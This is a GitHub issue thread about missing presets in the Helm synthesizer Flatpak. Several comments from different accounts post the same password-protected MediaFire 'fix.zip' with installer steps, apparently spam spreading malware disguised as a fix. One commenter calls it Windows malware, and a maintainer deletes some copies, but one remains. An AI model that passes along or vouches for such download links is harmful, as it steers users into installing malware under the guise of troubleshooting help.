### ISSUE TITLE
no presets included  

### ISSUE THREAD

**Issue by fatmalama** [flathub/org.freedesktop.LinuxAudio.Plugins.Helm#1]
there are no presets included with the flatpak. an usual installation from the site includes tons but this flatpak shows the list empty

attaching screenshot
![Screenshot_20240828_004951](https://github.com/user-attachments/assets/12a99fd8-1402-4bc9-9782-81a219574163)

when it should look like this
![Screenshot_20240828_005113](https://github.com/user-attachments/assets/5dc0c99c-8a0f-4f94-9ffd-6cb3dff653f0)

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mikelpr** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

yeah, no thanks with that windows malware. don't even know why you'd bother posting it here when flatpaks are for linux

**Comment by hfiguiere** [comment]
Deleted spam.

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
